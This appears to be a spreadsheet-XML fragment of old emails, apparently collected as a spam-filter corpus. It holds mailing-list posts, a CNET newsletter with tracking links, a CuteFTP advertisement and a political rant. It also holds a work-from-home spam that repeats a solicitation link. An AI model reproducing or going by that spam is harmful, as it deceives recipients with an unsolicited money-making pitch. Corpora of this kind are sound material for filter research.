 around to having a good old fashioned government-collapsing
 transfer-payment depression (an economic version of this summer's
 government-forest conflagration, caused by the same kind of
 innumeracy that not clear-cutting enough forests did out west this
 summer :-)) that should motivate more than a few erst-slackers out
 there, including me, :-), to learn to actually feed themselves.]
 The *next* category on the Forbes 400 list is someone with a
 "terminal" professional degree, like an MBA, PhD, MD, etc., from the
 best school possible.
 Why? Because, as of about 1950, the *best* way to get into Harvard,
 for instance, is to be *smart*, not rich. Don't take my word for it,
 ask their admissions office. Look at the admissions stats over the
 years for proof.
 Meritocracy, American Style, was *invented* at the Ivy League after
 World War II. Even Stanford got the hint, :-), and, of course,
 Chicago taught them all how, right? :-). Practically *nobody* who
 goes to a top-20 American institution of higher learning can actually
 afford to go there these days. Unless, of course, their parents, who
 couldn't afford to go there themselves, got terminal degrees in the
 last 40 years or so. And their kids *still* had to get the grades,
 and "biased" (by intelligence :-)), test scores, to get in.
 The bizarre irony is that almost all of those people with "terminal"
 degrees, until they actually *own* something and *hire* people, or
 learn to *make* something for a living all day on a profit and loss
 basis, persist in the practically insane belief, like life after
 death, that economics is some kind of zero sum game, that dumb people
 who don't work hard for it make all the money, and, if someone *is*
 smart, works hard, and is rich, then they stole their wealth somehow.
 BTW, none of you guys out there holding the short end of this
 rhetorical stick can blame *me* for the fact that I'm using it to
 beat you severely all over your collective head and shoulders. You
 were, apparently, too dumb to grab the right end. *I* went to
 Missouri, and *I* don't have a degree in anything actually useful,
 much less a "terminal" one, which means *I*'m broker than anyone on
 this list -- it's just that *you*, of all people, lots with
 educations far surpassing my own, should just plain know better. The
 facts speak for themselves, if you just open your eyes and *look*.
 There are no epicycles, the universe does not orbit the earth, and
 economics is not a zero-sum game. The cost of anything, including
 ignorance and destitution, is the forgone alternative, in this case,
 intelligence and effort.
 [I will, however, admit to being educated *waay* past my level of
 competence, and, by the way *you* discuss economics, so have you,
 apparently.]
 BTW, if we ever actually *had* free markets in this country,
 *including* the abolition of redistributive income and death taxes,
 all those smart people in the Forbes 400 would have *more* money, and
 there would be *more* self-made people on that list. In addition,
 most of the people who *inherited* money on the list would have
 *much* less of it, not even relatively speaking. Finally, practically
 all of that "new" money would have come from economic efficiency and
 not "stolen" from someone else, investment bubbles or not.
 That efficiency is called "progress", for those of you in The
 People's Republics of Berkeley or Cambridge. It means more and better
 stuff, cheaper, over time -- a terrible, petit-bourgeois concept
 apparently not worthy of teaching by the educational elite, or you'd
 know about it by now. In economic terms, it's also called an increase
 in general welfare, and, no, Virginia, I'm not talking about
 extorting money from someone who works, and giving it to someone who
 doesn't in order to keep them from working and they can think of some
 politician as Santa Claus come election time...
 In short, then, economics is not a zero sum game, property is not
 theft, the rich don't get rich off the backs of the poor, and
 redistributionist labor "theory" of value happy horseshit is just
 that: horseshit, happy or otherwise.
 To believe otherwise, is -- quite literally, given the time Marx
 wrote Capital and the Manifesto -- romantic nonsense.
 Cheers,
 RAH
 -----BEGIN PGP SIGNATURE-----
 Version: PGP 7.5
 iQA/AwUBPY511cPxH8jf3ohaEQLAsgCfZhsQMSvUy6GqJ5wgL52DwZKpIhMAnRuR
 YYboc+IcylP5TlKL58jpwEfu
 =z877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</si>
  <si>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I've never understood the mouse buffer operation with exmh either. Here's the 
 behaviour I have. I have exmh and XEmacs windows up, and a terminal window. (I 
 also have gnome1.4 running and enlightenment as wm.) I select text in the exmh 
 window and while it is highlighted, I can paste into anything else. If I select 
 it and then click so the highlighting is off, then what I paste is not the 
 recently-selected text in exmh, but an old selection. If I select in XEmacs and 
 leave it highlighted, I can paste it into exmh sedit window; but if it is no 
 longer highlighted, what I paste is an old selection. I can live with this 
 behaviour except for one additional thing. If nothing is highlighted, then what 
 I paste into exmh is different from what I paste into other windows. To be more 
 specific, here's what gets pasted if nothing is highlighted:
 Application       What gets pasted
 XEmacs            whatever was last selected unless it was last selected in exmh
 xterm             same as XEmacs
 AbiWord           nothing
 Nedit             nothing
 sedit             Whatever was last highlighted in sedit and overwritten
 The last needs some amplification. If I highlight something in sedit, then 
 obviously that's what gets pasted. If the highlighting is off, then what gets 
 pasted is NOT what was last highlighted in sedit, but what was last highlighted 
 and typed over (I have "Type Kills SEL" on.).
 It seems that exmh and sedit are the oddballs here. Very often when I try to 
 paste something in sedit I end up muttering WTF??
 --
 rick
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: EARN MONEY AT HOME
</t>
  </si>
  <si>
    <t xml:space="preserve">Do you want to make money from home?  Are you tired
 of working for someone else? Then welcome to the 
 future.  
 http://www.lotsonet.com/homeopp/
 Due to our overwhelming growth of nearly 1,000% 
 over the last three years, we have an immediate 
 need and are willing to train and develop even 
 non-experienced individuals in local markets.
 http://www.lotsonet.com/homeopp/
 We are a 14 year old Inc 500 company.  Are you 
 willing to grow?  Are you ready to take on the
 challenges of the future?  Than we want you!
 Simply click on the link below for free information!
 No obligation whatsoever.
 http://www.lotsonet.com/homeopp/
 To be removed from this list go to:
 www.lotsonet.com/homeopp/remove.html
 8232uIAl6-753PUkF1189GdAA5-028quJX3243TdaE2-074Tyus9203nLbO9-417tEAl63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</si>
  <si>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[Razor-users] Collision of hashes?
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 de'i Thursday 29 August 2002 13:36 la Fox cusku di'e
 &gt; The following was personal correspondence between two people.  I can't
 &gt;
 &gt; fathom how Razor thinks it is spam:
 Was it sent in HTML? If so, and it had a background, the background may have 
 been sent in a spam.
 cmeclax
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9bq9f3/k1hdmG9jMRAk4XAJ9CheEA+/hLIU9zTzfJbPyoPUm+XwCfXgZ1
 tg7Fn8JcG9Q13UlKVfaOJzk=
 =Mw8+
 -----END PGP SIGNATURE-----
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Manoj Kasichainula wrote;
 &gt;http://www.snopes.com/quotes/bush.htm
 &gt;
 &gt;Claim:   President George W. Bush proclaimed, "The problem with
 &gt;the French is that they don't have a word for entrepreneur."
 &gt;
 &gt;Status:   False.
 Status: Crap.
 &gt;Lloyd Grove of The Washington Post was unable to reach Baroness
 &gt;Williams to gain her confirmation of the tale, but he did
 &gt;receive a call from Alastair Campbell, Blair's director of
 &gt;communications and strategy. "I can tell you that the prime
 &gt;minister never heard George Bush say that, and he certainly
 &gt;never told Shirley Williams that President Bush did say it,"
 &gt;Campbell told The Post. "If she put this in a speech, it must
 &gt;have been a joke."
 So some guy failed to reach the source, but instead got spin doctor to
 deny it.  Wot, is he thick enough to expect official confirmation
 that, yes, Blair is going around casting aspersions on Bush???
 It's an amusing anecdote, I don't know if it's true or not, but certainly
 nothing here supports the authoritative sounding conclusion "Status: False".
 R
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; Maybe.  I batch messages using fetchmail (don't ask why), and adding
 &gt; &gt; .4 seconds per message for a batch of 50 (not untypical) feels like a
 &gt; &gt; real wait to me...
 &gt; 
 &gt; Yeesh.  Sounds like what you need is something to kick up once and score
 &gt; an entire mailbox.
 &gt; 
 &gt; Wait a second...  So *that's* why you wanted -u.
 &gt; 
 &gt; If you can spare the memory, you might get better performance in this
 &gt; case using the pickle store, since it only has to go to disk once (but
 &gt; boy, does it ever go to disk!)  I can't think of anything obvious to
 &gt; speed things up once it's all loaded into memory, though.  That's
 &gt; profiler territory, and profiling is exactly the kind of optimization
 &gt; I just said I wasn't going to do :)
 We could have a server mode (someone described this as an SA option).
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Blue people of the world unite!
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85528842
 Date: Not supplied
 [IMG: http://www.craphound.com/images/bluelady.jpg] Stan Jones isn't the only 
 person to have turned himself blue with quack silver remedies. "Rosemary" took 
 silver supplements in the 50s for her allergies and put up this site in 1998 to 
 warn others off of the horror of blue skin for life. Link[1] Discuss[2] (_
 Thanks, Stefan!_) 
 [1] http://together.net/~rjstan/rose1.html
 [2] http://www.quicktopic.com/boing/H/tCar7pZ5ypi
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cordless phones: the other wireless devices
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Cell Phone Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;
 &lt;a href="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=442 colspan=4&gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/wr/442_cellphone_nwsltr.gif" width="442" height="60" border="0" alt="CNET Wireless Dispatch"&gt;&lt;br&gt;
 	&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
 		&lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;tr&gt;&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img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 shopping  --&gt;
 &lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOs8dNuIYkCs3CyJqsjeorR" target="new"&gt;   
 &lt;img src="http://view.atdmt.com/AVE/view/aws05000012ave/direct;wi.160;hi.600/01/" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /shopping --&gt;
 	&lt;br&gt;&lt;!-- right column content --&gt;
 	&lt;!-- search form --&gt;
 	&lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;
 		&lt;form method="get" action="http://www.search.com/redirect"&gt;
 		&lt;tr valign=top&gt;&lt;td&gt;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value="http://wireless.search.com/search?tag=ex.wireless.dispatch.srch.cnet"&gt;Wireless
  			&lt;option value="http://cnet.search.com/search?tag=ex.wireless.dispatch.srch.cnet"&gt;All CNET
  			&lt;option value="http://www.search.com/search?tag=ex.wireless.dispatch.srch.web"&gt;The Web
 			&lt;/select&gt;&amp;nbsp;
 			&lt;input type=submit value="Go!"&gt;&lt;/font&gt;
 		&lt;/td&gt;&lt;/tr&gt;
 		&lt;/form&gt;
 	&lt;/table&gt;&lt;p&gt;
 	&lt;!-- /search form --&gt;
 	&lt;/td&gt;
 	&lt;td width=9 rowspan=2&gt;&lt;img src="http://home.cnet.com/i/dp/dd_c.gif"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
 	&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
 		&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- promo section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
 			&lt;td width=10&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;!-- td width=252&gt; --&gt;&lt;td width=150&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="8" border="0"&gt;&lt;br&gt;
 			&lt;font face="Arial, Helvetica" size="-2"&gt;July 18, 2002&lt;/font&gt;&lt;br&gt;
 			&lt;img src="http://home.cnet.com/b.gif" width="1" height="4" border="0"&gt;&lt;br&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 width=170&gt;
 					&lt;tr valign=top&gt;&lt;td&gt;&lt;a href="#h1"&gt;&lt;img src="http://home.cnet.com/i/dp/arrow2.gif" alt="" width="10" height="12" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 					 	&lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="#h1"&gt;Cordless phones: the other wireless devices&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr valign=top&gt;&lt;td&gt;&lt;a href="#h2"&gt;&lt;img src="http://home.cnet.com/i/dp/arrow2.gif" alt="" width="10" height="12" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 					 	&lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="#h2"&gt;Samsung SPH-A460&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr valign=top&gt;&lt;td width=15&gt;&lt;a href="#h3"&gt;&lt;img src="http://home.cnet.com/i/dp/arrow2.gif" alt="" width="10" height="12" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 						&lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="#h3"&gt;What phones are hot in Asia--updated&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;img src="http://home.cnet.com/b.gif" width="1" height="8" border="0"&gt;&lt;br&gt;	
 			&lt;/td&gt;
 			&lt;td width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=1 bgcolor="#F7D69C"&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=240&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
 				&lt;div style="padding: 8px 0px 8px"&gt;&lt;font size="-1"&gt;&lt;b&gt;Wireless Top 5s&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 					&lt;ul&gt;
 					&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=09-joDSIj8jsk9his8LYSS7ZMgtY8lR" &gt;Top 5 AT&amp;T Wireless cell phones&lt;/a&gt;&lt;br&gt;
 					&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jPx9j-7tPqEsB8LE27qd4R" &gt;Top 5 Sprint PCS phones&lt;/a&gt;&lt;br&gt;
 					&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=33-vUjnINjcJokhsUgz6yClxb-7XsrR" &gt;Top 5 Verizon Wireless cell phones&lt;/a&gt;
 				&lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBwVs_7VN_Xl_kj2ZBSJuRR" &gt;All Top 5s&lt;/a&gt;&lt;/ul&gt;&lt;/div&gt;
 				&lt;img src="http://home.cnet.com/b.gif" height=6 width=1&gt;&lt;br&gt;
 			&lt;/td&gt;
 			&lt;td width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;!-- bottom rule --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 		&lt;tr valign=top&gt;&lt;td bgcolor="#F7D69C"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=5d-JN-bIK0w8sxTOwBobvZm5yGKIaZR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/042502mpsplayers.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUeno9qCzfrqMtNXjoCKqdR" &gt;&lt;b&gt;Next-generation MP3 players&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;These three hard drive-based MP3 players turn last year's models into paperweights.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=87-izDOQ8n4W11B-hleplrQ8kasp4eR" &gt;Mojo rising: TDK's new MP3 CD player&lt;/a&gt;&lt;br /&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanVDf4DloYlXdIl9Oi-UiyR" &gt;The Nomad Jukebox 3 breaks new ground&lt;/a&gt;&lt;br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popular&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="5" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;MP3 &amp;amp; Audio&lt;/b&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	1. &lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0MIpriPYUr9i_f_B0NLnlR" &gt;Creative Labs Nomad Jukebox 3&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	2. &lt;a href="http://clickthru.online.com/Click?q=c7-KG43QLPPHrPhpi7NWtUoF24wxeeR" &gt;Digitalway MPIO-DMK (128 MB)&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	3. &lt;a href="http://clickthru.online.com/Click?q=dc-40zzQ0LQvq0arTSBz6gEwTinhlyR" &gt;Bantam Interactive Explor BA350&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	4. &lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsTLuoIfIMH3XX8owMnerlR" &gt;iRiver SlimX iMP-350&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	5. &lt;a href="http://clickthru.online.com/Click?q=06-fP6uI481hKhaT6Hmap_vCgSyiL4R" &gt;Sonicblue Rio Volt SP250&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N1z0zxtloQ1U5MauO37xrR" &gt;See all most popular&lt;/a&gt;&lt;/b&gt;&lt;br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
 &lt;!-- /Leads Module --&gt;
 &lt;table border="0" width="100%" cellpadding="10" cellspacing="0"&gt;
 	&lt;tr&gt;&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;			
 		&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/lx/sub_rev.gif" alt="Reviews &amp; Features" width="200" height="19" border="0"&gt;&lt;br&gt;
 		&lt;img src="http://home.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br /&gt;
 &lt;!--item 1--&gt;		
 &lt;a name="h1"&gt;&lt;/a&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=30-u8NEIRrPLwAEz718IeOdSKzjX1iR" &gt;Cordless phones: the other wireless devices&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 In the market for a new cordless phone but don't know 
 whether to buy a 900MHz or 2.4GHz model or what manufacturer 
 offers the best product? No sweat--check out our new line 
 coverage to find the phone that fits your personal style 
 and needs.
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKBij6bgZak-EDvznhjonlZR" &gt;Read the reviews&lt;/a&gt; &lt;!-- &amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0zdKP6JGV24YOLpk6Td6dR" &gt;Notify me when this is available&lt;/a&gt; --&gt;&lt;/b&gt;
 &lt;br clear="all"&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!--item 2--&gt;
 &lt;a name="h2"&gt;&lt;/a&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdpiybZfgomKns2asfI8UkRR" &gt;Samsung SPH-A460&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The update to the SPH-A400 offers some cool enhancements, 
 such as an external LCD. Is this the flip phone of the 
 moment for Sprint PCS service? 
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=85-2G2oQ7KreJD6Vn_af70SVbToBBPR" &gt;Read the review&lt;/a&gt;
 &amp;nbsp;&amp;#124;&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=9a-b6_GQTMpSkCDs08Figi7yr9FKgnR" &gt;Check latest prices&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- center1 --&gt;
 &lt;!-- /center1 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;a name="h3"&gt;&lt;/a&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=af--dB8QLp7D-ceh8YydDX7NdmUVSeR" &gt;What phones are hot in Asia--updated&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Wonder what people are talking on over on the other side 
 of the Pacific? Check out the most current top 10 list from 
 our sister site in Singapore.
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0WstJ9ENoukHF6q-jPexAyR" &gt;See the list&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!--Horizontal Brick--&gt;
 &lt;P&gt;
 &lt;IMG border=0 height=20 src="http://home.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 NOSEND="1"&gt; 
 &lt;IMG border=0 height=8 src="http://home.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 	&lt;TBODY&gt;&lt;TR vAlign=top&gt;
     	&lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
             &lt;UL&gt;&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=d9-b7L_QpPspJB07a4ie23s1N87hJlR" &gt;Live tech help; submit your question now&lt;/A&gt; 
 				&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=ee-ZbmWQwDDxi06jsO0QzbMuLbLad4R" &gt;CNET News.com: Top CIOs on the future of IT&lt;/A&gt; 
 				&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rIIxo0mMdhKQcaLlAI6OrR" &gt;Find a job you love, with more than 1 million postings&lt;/A&gt; 
 				&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=18-WhdzI987phkswbgTiMEyR1N675iR" &gt;ZDNet: This IT director has had enough of Microsoft&lt;/A&gt; 
 				&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=2d-OxQyIbKxNl5DhZgVdngyV7VDjSPR" &gt;May Editors' Choice award: Pioneer's home-theater system, the HTS-910DV&lt;/A&gt; 
 			&lt;/UL&gt;
 			&lt;/B&gt;&lt;/FONT&gt;
 		&lt;/TD&gt;&lt;/TR&gt;
 	&lt;/TBODY&gt;
 &lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Horizontal Brick--&gt;
 	&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- &lt;br&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="30" border="1"&gt;&lt;br&gt; --&gt;
 &lt;/td&gt;&lt;/tr&gt;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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;p&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=43-coY5zNJRL1zD_lgTZI_0XxbpK39OTdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJxs_imtwDYjKHbtbXYzHRR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEzJC842xE7Bc1bJBykEmZR"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href="http://clickthru.online.com/Click?q=82-P0EYQXK2G6PdEh46gJLkjCXMZHnR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=97-dlfYQ1M2Zi6YKdT3V0z6qjySJGeR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ac-RbKtQ0UJo8PwZwydWfGJ0kSyVjyR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=c1-PIljQpW7B441TXEwiOPYOLipujlR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=d6-yw2KQMPMW6zs43rnOIRzw0LGkk4R" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=eb-HlpoQkDTzhBV2Pedo6MzbuNK5xrR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e459&amp;ISSUE=2002-07-18" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=01-9oQDnEjoOqM_8eC3hPwESegnYsRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CuteFTP Pro 3.0 Released!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=NextPart00A_000_73019636D
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 November 2002
 Dear CuteFTP User,
 New Release!
 GlobalSCAPE is pleased to announce the latest release of CuteFTP Pro, 
 "Designed for Windows XP". The "Designed for XP" logo confirms that 
 CuteFTP Pro 3.0 meets Windows XP compatibility, performance and 
 stability criteria. CuteFTP Pro 3.0 runs on Windows 9x, NT, ME, 2000 and 
 XP. 
 --------------------------------------------------------------------------
 ------
 Purchase
 Purchase CuteFTP Pro 3.0 for just $59.95! 
 Buy Now: 
 http://www.globalscape.com/email/redirect.asp?id=pr3unreg&amp;link=buy
 Download Free Trial:
 http://www.globalscape.com/download/cuteftppro.asp
 For volume discounts and site license pricing, contact our sales team:
 800-290-5054 (USA)
 210-308-8267 (Int'l)
 sales@globalscape.com
 --------------------------------------------------------------------------
 ------
 NEW! XP Logo Certified 
 CuteFTP Pro has been updated to conform to Microsoft's Windows XP 
 Design Guidelines. Note: You must have Windows XP in order to take 
 advantage of the new XP interface. 
 NEW! Enhanced Security
 SSH2 public key support, Cipher and MAC selection, SSH2 rename and 
 ASCII transfers, password policies, and more. 
 NEW! Site &amp; Folder Maintenance 
 Folder Monitoring tool, Backup &amp; Archival tool, Server Time-zone Offset, 
 Preserve Local Time option and more. 
 NEW! Classic CuteFTP Features
 Load &amp; save queue, Folder Compare, startup and after transfer events, 
 group selection, and more. 
 NEW! Enhanced Queue
